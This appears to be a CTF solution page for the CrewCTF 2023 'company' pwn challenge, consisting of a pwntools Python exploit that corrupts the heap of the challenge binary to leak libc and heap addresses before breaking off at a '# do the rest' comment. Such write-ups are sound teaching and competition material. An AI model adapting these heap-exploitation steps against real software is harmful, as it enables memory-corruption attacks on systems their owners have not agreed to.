Project Sekai
🔒 CrewCTF 2023 / ✅-pwn-company
nc company.chal.crewc.tf 17001
Files:Tags: No tags.
#!/usr/bin/env python3
from pwn import *
exe = ELF("./company_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")
context.binary = exe
def conn():
if args.LOCAL:
r = process(exe.path, env={"LD_PRELOAD": libc.path})
if args.DEBUG:
gdb.attach(r)
else:
r = remote("addr", 1337)
return r
def add_employee(ind, name, position, salary):
p.sendlineafter(">>", b"1")
p.sendlineafter("Index:", str(ind))
p.sendlineafter("Name:", name)
p.sendlineafter("Position:", position)
p.sendlineafter("Salary:", str(salary))
def fire_employee(ind):
p.sendlineafter(">>", b"2")
p.sendlineafter("Index:", str(ind))
def give_feedback(ind1, ind2, feedback):
p.sendlineafter(">>", b"3")
p.sendlineafter("are?", str(ind1))
p.sendlineafter("?", str(ind2))
p.sendlineafter("Feedback:", feedback)
def view_feedback(ind):
p.sendlineafter(">>", b"4")
p.sendlineafter("see?", str(ind))
to_free = 0x404070
p = conn()
p.sendlineafter("name", p64(0) + p64(0x61))
add_employee(0, "HR", b"HR\0", 1234)
add_employee(1, "not HR", "not HR", 1234)
add_employee(2, "not HR", "not HR", 1234)
give_feedback(0, 1, p64(to_free)*9)
fire_employee(1)
add_employee(1, "not HR", "not HR", 1234)
fire_employee(1)
add_employee(1, "A"*0x10 + "HR\0", p64(0x404020) + p64(0x4040b0) + p64(0x404050) + p64(0x404070), 0x404058)
view_feedback(0)
libc_leak = u64(p.recvuntil("\x7f")[-6:] + b'\0\0')
view_feedback(3)
p.recvuntil("Feedback:")
heap_leak = u64(p.recvline().strip().ljust(8, b'\0'))
print(hex(libc_leak))
print(hex(heap_leak))
libc_base = libc_leak - 0x22d780
# do the rest
p.interactive()
